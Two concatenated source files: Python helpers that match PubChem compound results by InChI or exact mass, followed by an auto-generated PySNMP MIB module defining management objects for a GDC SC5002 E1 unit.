    results_pubchem = [pcp.Compound.from_cid(sid['CID']) for sid in sids_pubchem]
    logger.debug("Found at least %s compounds of with formula: %s.",
                 len(results_pubchem), compound_formula)
    return results_pubchem
def find_pubchem_inchi_match(results_pubchem,
                             inchi,
                             min_inchi_match=3,
                             verbose=1):
    """Searches pubmed matches for inchi match.

    Then check if inchi can be matched to (defective) input inchi.
    Outputs found inchi, inchikey and smiles (all None if none is found).

    Parameters
    ----------
    results_pubchem: List[dict]
        List of name search results from Pubchem.
    inchi: str
        Inchi (correct, or defective...). Set to None to ignore.
    min_inchi_match: int
        Minimum number of first parts that MUST be a match between both input
        inchi to finally consider it a match. Default is min_inchi_match=3.
    """
    inchi_pubchem = None
    inchikey_pubchem = None
    smiles_pubchem = None
    # Fixed: initialize so an empty result list no longer raises
    # UnboundLocalError at the `if not match_inchi:` check below.
    match_inchi = False

    # Loop through first 'name_search_depth' results found on pubchem. Stop once first match is found.
    for result in results_pubchem:
        inchi_pubchem = '"' + result.inchi + '"'
        inchikey_pubchem = result.inchikey
        smiles_pubchem = result.isomeric_smiles
        if smiles_pubchem is None:
            smiles_pubchem = result.canonical_smiles

        match_inchi = likely_inchi_match(inchi, inchi_pubchem,
                                         min_agreement=min_inchi_match)

        if match_inchi:
            logger.info("Matching inchi: %s", inchi)
            if verbose >= 1:
                logger.info("Found matching compound for inchi: %s (Pubchem: %s)",
                            inchi, inchi_pubchem)
            break

    if not match_inchi:
        inchi_pubchem = None
        inchikey_pubchem = None
        smiles_pubchem = None
        if verbose >= 2:
            logger.info("No matches found for inchi %s.", inchi)

    return inchi_pubchem, inchikey_pubchem, smiles_pubchem
def find_pubchem_mass_match(results_pubchem,
                            parent_mass,
                            mass_tolerance,
                            given_mass="parent mass",
                            allowed_differences=((18.03, 0.01),),
                            verbose=1):
    """Search PubChem results for a compound matching the given mass.

    Scans the results in order and stops at the first compound whose exact
    mass is within `mass_tolerance` of `parent_mass`, or whose mass
    difference matches one of the `allowed_differences` (e.g. water loss).
    Returns the found inchi, inchikey and smiles (each will be None if no
    match is found).

    Parameters
    ----------
    results_pubchem: List[dict]
        List of name search results from Pubchem.
    parent_mass: float
        Spectrum"s guessed parent mass.
    mass_tolerance: float
        Acceptable mass difference between query compound and pubchem result.
    given_mass
        String to specify the type of the given mass (e.g. "parent mass").
    allowed_differences:
        Sequence of (difference, tolerance) pairs that also count as a match;
        default accepts a ~18.03 difference (water/ammonium-related losses).
        A tuple is used to avoid a mutable default argument.
    """
    inchi_pubchem = None
    inchikey_pubchem = None
    smiles_pubchem = None
    mass_difference = None
    # Track the closest miss for the "no match" log message below.
    lowest_mass_difference = [np.inf, None]
    # Initialize here so an empty result list reports "no match" instead of
    # raising UnboundLocalError below.
    match_mass = False
    for result in results_pubchem:
        inchi_pubchem = '"' + result.inchi + '"'
        inchikey_pubchem = result.inchikey
        smiles_pubchem = result.isomeric_smiles
        if smiles_pubchem is None:
            smiles_pubchem = result.canonical_smiles
        # Compare against THIS result's mass. The original code read
        # results_pubchem[0].exact_mass, so only the first hit's mass was
        # ever tested regardless of the loop variable.
        pubchem_mass = float(result.exact_mass)
        mass_difference = np.abs(pubchem_mass - parent_mass)
        if mass_difference < lowest_mass_difference[0]:
            lowest_mass_difference[0] = mass_difference
            lowest_mass_difference[1] = inchi_pubchem
        match_mass = (mass_difference <= mass_tolerance)
        for diff in allowed_differences:
            match_mass = match_mass or np.isclose(mass_difference, diff[0], atol=diff[1])
        if match_mass:
            logger.info("Matching molecular weight (%s vs %s of %s)",
                        pubchem_mass, given_mass, parent_mass)
            break
    if not match_mass:
        # Discard the values left over from the last (non-matching) result.
        inchi_pubchem = None
        inchikey_pubchem = None
        smiles_pubchem = None
        logger.info("No matching molecular weight (best mass difference was %s for inchi: %s)",
                    lowest_mass_difference[0], lowest_mass_difference[1])
    return inchi_pubchem, inchikey_pubchem, smiles_pubchem
|
#
# PySNMP MIB module SC5002-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/SC5002-MIB
# Produced by pysmi-0.3.4 at Wed May 1 15:00:56 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
# Symbol imports: resolved at MIB load time through the runtime `mibBuilder`
# object, which is injected by the pysnmp loader (it is not defined in this
# generated file).
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsUnion, ValueSizeConstraint, ValueRangeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsUnion", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsIntersection")
SCinstance, = mibBuilder.importSymbols("GDCMACRO-MIB", "SCinstance")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, enterprises, Counter32, iso, NotificationType, TimeTicks, Bits, MibIdentifier, ModuleIdentity, IpAddress, ObjectIdentity, Counter64, Unsigned32, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "enterprises", "Counter32", "iso", "NotificationType", "TimeTicks", "Bits", "MibIdentifier", "ModuleIdentity", "IpAddress", "ObjectIdentity", "Counter64", "Unsigned32", "Gauge32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
# OID registration tree under the GDC enterprise arc (1.3.6.1.4.1.498):
# one MibIdentifier per functional group of the SC5002 MIB.
gdc = MibIdentifier((1, 3, 6, 1, 4, 1, 498))
dsx1 = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6))
sc5002 = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8))
sc5002Version = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 1))
sc5002NetworkCfg = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 2))
sc5002Alarms = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3))
sc5002Diagnostics = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 4))
sc5002Maintenance = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 5))
sc5002Performance = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 6))
# Version group (…8.1): MIB revision scalar plus a per-instance table of
# firmware revisions and firmware-download controls.
sc5002MIBversion = MibScalar((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(5, 5)).setFixedLength(5)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002MIBversion.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002MIBversion.setDescription("Identifies the version of the MIB. The format of the version is x.yzT, where 'x' identifies the major revision number, 'y' identifies the minor revision number, 'z' identifies the typographical revision, and T identifies the test revision. Upon formal release, no designation for the test revision will be present. Acceptable values for the individual revision components are as follows: x: 1 - 9, y: 0 - 9, z: 0 - 9, T: A - Z")
sc5002VersionTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 2), )
if mibBuilder.loadTexts: sc5002VersionTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002VersionTable.setDescription(' ')
sc5002VersionEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 2, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002VersionIndex"))
if mibBuilder.loadTexts: sc5002VersionEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002VersionEntry.setDescription('An entry in the GDC SC5002 Version Table.')
sc5002VersionIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 2, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002VersionIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002VersionIndex.setDescription('Identifies Version parameters associated with the managed object.')
sc5002ActiveFirmwareRev = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(8, 8)).setFixedLength(8)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002ActiveFirmwareRev.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002ActiveFirmwareRev.setDescription('The version number of the firmware currently executing. The format is MM.NN.BB where: MM: Major Revision (0-99) NN: Minor Revision (0-99) BB: Bug Fix Revision (0-99) ')
sc5002StoredFirmwareRev = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 2, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(8, 8)).setFixedLength(8)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002StoredFirmwareRev.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002StoredFirmwareRev.setDescription('The version number of the firmware stored (in a compressed format) but not currently executing. MM: Major Revision (0-99) NN: Minor Revision (0-99) BB: Bug Fix Revision (0-99) ')
sc5002BootRev = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(2, 2)).setFixedLength(2)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002BootRev.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002BootRev.setDescription('The version number of the bootstrap firmware. The version number of the firmware, to allow products to know which revision is installed. The released version number is sequenced from --, A-, ... AA, ... ZZ. ')
sc5002StoredFirmwareStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 2, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("statBlank", 1), ("statDownLoading", 2), ("statOK", 3), ("statCheckSumBad", 4), ("statUnZipping", 5), ("statBadUnZip", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002StoredFirmwareStatus.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002StoredFirmwareStatus.setDescription('This object represents the state of the Non-Active or Stored firmware: statBlank(1) Factory Default statDownLoading(2) In process of downloading firmware statOK(3) Zipped version checksum succesful (OK to switch) (can set sc5002SwitchActive to switchActive(2)) statCheckSumBad(4) Failed checksum after download statUnZipping(5) In process of uncompressing into active area statBadUnZip(6) Failed last uncompress The object is read only. ')
sc5002SwitchActiveFirmware = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 2, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("switchNorm", 1), ("switchActive", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002SwitchActiveFirmware.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002SwitchActiveFirmware.setDescription('This object is used to switch the active executing firmware from the version in sc5002ActiveRev to the version in sc5002StoredRev. When a switchActive(2) is set (write only) the element will: 1) reboot 2) uncompress stored code into active area 3) perform checksum on active area 4) Set sc5002StoredStatus object to indicate results 5) If succesfull: update sc5002ActiveFirmwareRev and sc5002StoredFirmwareRev and begin executing If failed: replace active area with previous revision The switchNorm(1) enumeration will always be read. Setting switchActive(2) when the sc5002StoredStatus is not statOK(3) will result in an error. ')
sc5002DownloadingMode = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 2, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("disableAll", 1), ("enableAndWait", 2), ("enableAndSwitch", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002DownloadingMode.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002DownloadingMode.setDescription('This object is used to configure the download mode: disableAll(1) Prevents any firmware downloading to SC5002 enableAndWait(2) Allows downloading zipped code to be stored only! enableAndSwitch(3) Allows downloading and then unzips and begins executing the new code ')
sc5002FirmwareRev = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 2, 1, 8), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(2, 2)).setFixedLength(2)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FirmwareRev.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FirmwareRev.setDescription('The version number of the firmware. Released versions are sequenced from --, A-, ... AA, ... ZZ. Test versions are from 01 to 99.')
# Network configuration group (…8.2): E1 network-interface settings,
# indexed by SCinstance (shelf/line/drop/channel packed into one integer).
sc5002NetworkCfgTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 2, 1), )
if mibBuilder.loadTexts: sc5002NetworkCfgTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NetworkCfgTable.setDescription('This table contains objects that support the specific management requirements for configuring the SC5002 Network Interface level objects.')
sc5002NetworkCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 2, 1, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002NetworkCfgIndex"))
if mibBuilder.loadTexts: sc5002NetworkCfgEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NetworkCfgEntry.setDescription('The sc5002 Network Configuration Table Entry.')
sc5002NetworkCfgIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 2, 1, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NetworkCfgIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NetworkCfgIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002E1SignalingMode = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 2, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("assocChanSigWithCRC4", 1), ("assocChanSigNoCRC4", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002E1SignalingMode.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002E1SignalingMode.setDescription('Specifies the channel signaling scheme for the E1 network interface.')
# Alarm identifiers (…8.3.1): one OID per alarm type. These OIDs are the
# values carried in the AlarmCfgIdentifier columns of the tables below.
sc5002AlarmData = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1))
sc5002NoResponse = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 1))
sc5002DiagRxErr = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 2))
sc5002PowerUp = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 3))
sc5002NvRamCorrupt = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 4))
sc5002UnitFailure = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 5))
sc5002TimingLoss = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 6))
sc5002LossOfSignal = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 7))
sc5002LossOfFrame = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 8))
sc5002AlarmIndSignal = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 9))
sc5002FallbackTimingActive = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 10))
sc5002NearEndLnCodeViol = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 11))
sc5002NearEndErrSec = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 12))
sc5002NearEndBkdBlkErr = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 13))
sc5002NearEndSevErrSec = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 14))
sc5002NearEndUnavlSec = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 15))
sc5002FarEndErrSec = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 16))
sc5002FarEndBkdBlkErr = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 17))
sc5002FarEndSevErrSec = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 18))
sc5002FarEndUnavlSec = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 19))
# Alarm configuration tables (…8.3.2 and …8.3.3): near-end and far-end
# tables with identical structure — each row is (instance, alarm OID) and
# carries a reporting window plus an event-count threshold.
sc5002NearEndAlarmCfgTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 2), )
if mibBuilder.loadTexts: sc5002NearEndAlarmCfgTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndAlarmCfgTable.setDescription('This table contains entries that configure Near End Alarm reporting.')
sc5002NearEndAlarmCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 2, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002NearEndAlarmCfgIndex"), (0, "SC5002-MIB", "sc5002NearEndAlarmCfgIdentifier"))
if mibBuilder.loadTexts: sc5002NearEndAlarmCfgEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndAlarmCfgEntry.setDescription('An entry in the Near End Alarm Configuration table.')
sc5002NearEndAlarmCfgIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 2, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndAlarmCfgIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndAlarmCfgIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002NearEndAlarmCfgIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 2, 1, 2), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndAlarmCfgIdentifier.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndAlarmCfgIdentifier.setDescription('format: iso.org.dod.internet.private.enterprises.gdc. dsx1.sc5002.sc5002Alarms.sc5002AlarmData.ALM example: 1.3.6.1.4.1.498.6.8.4.1.ALM where ALM = 1 for sc5002NoResponse alarm, 2 for sc5002DiagRxErr alarm, etc., as specified in the Alarm Definitions above.')
sc5002NearEndAlarmWindow = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 2, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("win30sec", 1), ("win1min", 2), ("win15min", 3), ("win1hr", 4), ("win24hr", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002NearEndAlarmWindow.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndAlarmWindow.setDescription("The time period in which a specified number of events must occur, (specified by the alarm's threshold), before declaring an alarm condition. After reporting an Alarm condition and upon expiration of the window time period, the event count is reset to zero and another time period is begun. If the specified number of events is not exceeded within the next time period, an Alarm Cleared condition is reported.")
sc5002NearEndAlarmThreshold = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 2, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("thr1", 1), ("thr3", 2), ("thr10", 3), ("thr100", 4), ("thr1000", 5), ("thr10000", 6)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002NearEndAlarmThreshold.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndAlarmThreshold.setDescription("The number of events which must be exceed, within the time period specified by the alarm's window, before declaring an alarm")
sc5002FarEndAlarmCfgTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 3), )
if mibBuilder.loadTexts: sc5002FarEndAlarmCfgTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndAlarmCfgTable.setDescription('This table contains entries that configure Far End Alarm reporting.')
sc5002FarEndAlarmCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 3, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002FarEndAlarmCfgIndex"), (0, "SC5002-MIB", "sc5002FarEndAlarmCfgIdentifier"))
if mibBuilder.loadTexts: sc5002FarEndAlarmCfgEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndAlarmCfgEntry.setDescription('An entry in the Far End Alarm Configuration table.')
sc5002FarEndAlarmCfgIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 3, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndAlarmCfgIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndAlarmCfgIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002FarEndAlarmCfgIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 3, 1, 2), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndAlarmCfgIdentifier.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndAlarmCfgIdentifier.setDescription('format: iso.org.dod.internet.private.enterprises.gdc. dsx1.sc5002.sc5002Alarms.sc5002AlarmData.ALM example: 1.3.6.1.4.1.498.6.8.4.1.ALM where ALM = 1 for sc5002NoResponse alarm, 2 for sc5002DiagRxErr alarm, etc., as specified in the Alarm Definitions above.')
sc5002FarEndAlarmWindow = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 3, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("win30sec", 1), ("win1min", 2), ("win15min", 3), ("win1hr", 4), ("win24hr", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002FarEndAlarmWindow.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndAlarmWindow.setDescription("The time period in which a specified number of events must occur, (specified by the alarm's threshold), before declaring an alarm condition. After reporting an Alarm condition and upon expiration of the window time period, the event count is reset to zero and another time period is begun. If the specified number of events is not exceeded within the next time period, an Alarm Cleared condition is reported.")
sc5002FarEndAlarmThreshold = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 3, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("thr1", 1), ("thr3", 2), ("thr10", 3), ("thr100", 4), ("thr1000", 5), ("thr10000", 6)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002FarEndAlarmThreshold.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndAlarmThreshold.setDescription("The number of events which must be exceed, within the time period specified by the alarm's window, before declaring an alarm")
# Maintenance group (…8.5): per-unit reset/initialization controls,
# statistics-reset actions, LED snapshot and uptime.
sc5002MaintenanceTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1), )
if mibBuilder.loadTexts: sc5002MaintenanceTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002MaintenanceTable.setDescription('The table describes the maintenance objects for the unit and references the unit interface (cc = 00).')
sc5002MaintenanceEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002MaintenanceLineIndex"))
if mibBuilder.loadTexts: sc5002MaintenanceEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002MaintenanceEntry.setDescription('An entry in the GDC E1 Maintenance Table.')
sc5002MaintenanceLineIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002MaintenanceLineIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002MaintenanceLineIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002SoftReset = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("reset", 1), ("norm", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002SoftReset.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002SoftReset.setDescription('Supports the action of soft resetting the unit. When this object is set to reset(1), then the unit performs a soft reset, whose meaning is specific to the type of unit being managed. The value of norm(2) will be returned when the reset is complete. The value of norm(2) can not be set by management.')
sc5002DefaultInit = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("factoryDefault", 1), ("normal", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002DefaultInit.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002DefaultInit.setDescription('This is used to allow the NonVolatile Configuration to be set to a factory default state. When this value is set to factoryDefault(1) the unit will perform a reset to make the default configuration take effect. The value of normal(2) will be returned when the initialization is complete. The value of normal(2) can not be set by management.')
sc5002NearEndResetStats = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("norm", 1), ("reset", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002NearEndResetStats.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndResetStats.setDescription('Supports the action of soft resetting the sc5002NearEndValidIntervals object. When this object is set to reset(2), then the unit will reset the sc5002ValidIntervals object to zero. The value of norm(1) can not be set by management.')
sc5002NearEndStatLastInitialized = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndStatLastInitialized.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndStatLastInitialized.setDescription('Number of seconds from midnight Dec 31, 1969 up until sc5002NearEndValidIntervals was last initialized to zero')
sc5002FarEndResetStats = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("norm", 1), ("reset", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002FarEndResetStats.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndResetStats.setDescription('Supports the action of soft resetting the sc5002FarEndValidIntervals object. When this object is set to reset(2), then the unit will reset the sc5002ValidIntervals object to zero. The value of norm(1) can not be set by management.')
sc5002FarEndStatLastInitialized = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndStatLastInitialized.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndStatLastInitialized.setDescription('Number of seconds from midnight Dec 31, 1969 up until sc5002FarEndValidIntervals was last initialized to zero')
sc5002LedStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 8), OctetString().subtype(subtypeSpec=ValueSizeConstraint(3, 3)).setFixedLength(3)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002LedStatus.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002LedStatus.setDescription('Returns a bitwise snapshot of the front panel LED state. Octet 1 bit 7 - not used bit 6 - ON bit 5 - INSV bit 4 - RSP bit 3 - TMG bit 2 - NIU bit 1 - D_I bit 0 - future use Octet 2 bit 7 - not used bit 6 - future use bit 5 - NTWK AIS bit 4 - NTWK LCV bit 3 - NTWK LOS bit 2 - NTWK OOF bit 1 - ALM bit 0 - TM Octet 3 bit 7 - not used bit 6 - ST- future use bit 5 - LT- future use bit 4 - RL- future use bit 3 - TM transitions/flashing bit 2 - future use bit 1 - future use bit 0 - future use')
sc5002NearEndValidIntervals = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndValidIntervals.setStatus('mandatory')
